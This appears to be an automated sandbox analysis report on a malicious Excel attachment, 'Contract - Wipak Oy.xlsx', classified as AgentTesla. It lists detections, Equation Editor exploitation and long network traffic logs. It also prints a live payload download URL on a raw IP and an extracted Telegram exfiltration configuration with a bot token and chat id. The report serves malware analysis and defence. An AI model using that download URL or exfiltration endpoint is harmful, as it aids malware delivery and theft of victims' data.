Windows Analysis Report
Contract - Wipak Oy.xlsx

Overview

General Information

Sample Name: Contract - Wipak Oy.xlsx
Analysis ID: 679189
MD5: d0cd467a481799f5dc06a498e24ff4ad
SHA1: da919b490b8192eab7c577b4a85337d09eb56a9e
SHA256: 831518fee7137eb607ad0fd8b629784dd692f981f6060465079945a13dba6c4c
Tags: xlsx
Infos:

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected AgentTesla
Antivirus / Scanner detection for submitted sample
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Writes to foreign memory regions
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Machine Learning detection for sample
Allocates memory in foreign processes
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Shellcode detected
Yara detected Generic Downloader
Office equation editor drops PE file
Machine Learning detection for dropped file
Office equation editor establishes network connection
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
One or more processes crash
May sleep (evasive loops) to hinder dynamic analysis
Internet Provider seen in connection with other malware
Detected potential crypto function
Stores large binary data to the registry
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Enables debug privileges
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection

barindex
Source: Contract - Wipak Oy.xlsx Virustotal: Detection: 53% Perma Link
Source: Contract - Wipak Oy.xlsx ReversingLabs: Detection: 41%
Source: Contract - Wipak Oy.xlsx Avira: detected
Source: http://109.206.241.81/htdocs/zTALg.exe Avira URL Cloud: Label: malware
Source: http://109.206.241.81/htdocs/zTALg.exe Virustotal: Detection: 19% Perma Link
Source: Contract - Wipak Oy.xlsx Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\qGTGx[1].exe Joe Sandbox ML: detected
Source: 6.0.powershell_ise.exe.400000.0.unpack Avira: Label: TR/Spy.Gen8
Source: 6.0.powershell_ise.exe.400000.0.unpack Malware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Chat id": "-624834641", "Chat URL": "https://api.telegram.org/bot5520247480:AAEoBq-eVV-KfON2FKSf_2riekCozVDdnus/sendDocument"}

Exploits

barindex
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Network connect: IP: 136.243.86.20 Port: 443 Jump to behavior
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: unknown HTTPS traffic detected: 136.243.86.20:443 -> 192.168.2.22:49171 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.22:49172 version: TLS 1.2
Source: Binary string: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.pdb source: powershell_ise.exe, 00000006.00000002.1027587874.0000000002276000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\powershell_ise.pdbw source: powershell_ise.exe, 00000006.00000002.1027587874.0000000002276000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\exe\powershell_ise.pdb source: powershell_ise.exe, 00000006.00000002.1027587874.0000000002276000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: powershell_ise.pdbD source: powershell_ise.exe, 00000006.00000002.1027587874.0000000002276000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 9C:\Win.pdbSys source: powershell_ise.exe, 00000006.00000002.1027185092.0000000000398000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: .pdbN source: powershell_ise.exe, 00000006.00000002.1027185092.0000000000398000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: indows\symbols\exe\powershell_ise.pdb source: powershell_ise.exe, 00000006.00000002.1027587874.0000000002276000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\Users\Administrator\AppData\Local\Temp\2\System.Activities.pdb source: EQNEDT32.EXE, 00000002.00000002.996185247.0000000000586000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.996241614.000000000060A000.00000004.00000020.00020000.00000000.sdmp, jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe, 00000005.00000000.992431011.0000000000FF2000.00000020.00000001.01000000.00000005.sdmp, jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe.2.dr, qGTGx[1].exe.2.dr
Source: Binary string: T3npC:\Windows\powershell_ise.pdb source: powershell_ise.exe, 00000006.00000002.1027185092.0000000000398000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: powershell_ise.pdb source: powershell_ise.exe, 00000006.00000002.1027587874.0000000002276000.00000004.00000020.00020000.00000000.sdmp, powershell_ise.exe, 00000006.00000002.1027747753.000000000478D000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: indows\powershell_ise.pdbpdbise.pdb source: powershell_ise.exe, 00000006.00000002.1027587874.0000000002276000.00000004.00000020.00020000.00000000.sdmp

Software Vulnerabilities

barindex
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_038A8B6F LoadLibraryW,URLDownloadToFileW, 2_2_038A8B6F
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_038A8C60 LoadLibraryW,ExitProcess, 2_2_038A8C60
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_038A8BFC URLDownloadToFileW, 2_2_038A8BFC
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_038A8C70 ExitProcess, 2_2_038A8C70
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_038A8C90 ExitProcess, 2_2_038A8C90
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_038A8C2D ExitProcess, 2_2_038A8C2D
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_038A8C17 ExitProcess, 2_2_038A8C17
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_038A8B97 URLDownloadToFileW, 2_2_038A8B97
Source: global traffic DNS query: name: pkusukoharjo.com
Source: global traffic DNS query: name: cdn.discordapp.com
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 136.243.86.20:443
Source: global traffic TCP traffic: 136.243.86.20:443 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 136.243.86.20:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 136.243.86.20:443
Source: global traffic TCP traffic: 136.243.86.20:443 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 136.243.86.20:443 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 136.243.86.20:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 136.243.86.20:443
Source: global traffic TCP traffic: 136.243.86.20:443 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 136.243.86.20:443 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 136.243.86.20:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 136.243.86.20:443
Source: global traffic TCP traffic: 136.243.86.20:443 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 136.243.86.20:443 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 136.243.86.20:443
Source: global traffic TCP traffic: 136.243.86.20:443 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 136.243.86.20:443 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 136.243.86.20:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 136.243.86.20:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 136.243.86.20:443
Source: global traffic TCP traffic: 136.243.86.20:443 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 136.243.86.20:443 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 136.243.86.20:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 136.243.86.20:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 136.243.86.20:443
Source: global traffic TCP traffic: 136.243.86.20:443 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 136.243.86.20:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 136.243.86.20:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
Source: global traffic TCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
Source: global traffic TCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
Source: global traffic TCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
Source: global traffic TCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
Source: global traffic TCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
Source: global traffic TCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
Source: global traffic TCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
Source: global traffic TCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
Source: global traffic TCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
Source: global traffic TCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
Source: global traffic TCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
Source: global traffic TCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
Source: global traffic TCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
Source: global traffic TCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
Source: global traffic TCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
Source: global traffic TCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
Source: global traffic TCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
Source: global traffic TCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
Source: global traffic TCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
Source: global traffic TCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
Source: global traffic TCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
Source: global traffic TCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
Source: global traffic TCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
Source: global traffic TCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
Source: global traffic TCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
Source: global traffic TCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
Source: global traffic TCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
Source: global traffic TCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
Source: global traffic TCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
Source: global traffic TCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
Source: global traffic TCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
Source: global traffic TCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
Source: global traffic TCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
Source: global traffic TCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
Source: global traffic TCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
Source: global traffic TCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
Source: global traffic TCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
Source: global traffic TCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
Source: global traffic TCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
Source: global traffic TCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
Source: global traffic TCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
Source: global traffic TCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
Source: global traffic TCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
Source: global traffic TCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
Source: global traffic TCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
Source: global traffic TCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
Source: global traffic TCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
Source: global traffic TCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
Source: global traffic TCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
Source: global traffic TCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
Source: global traffic TCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
Source: global traffic TCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
Source: global traffic TCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
Source: global traffic TCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
Source: global traffic TCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
Source: global traffic TCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
Source: global traffic TCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
Source: global traffic TCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
Source: global traffic TCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
Source: global traffic TCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
Source: global traffic TCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
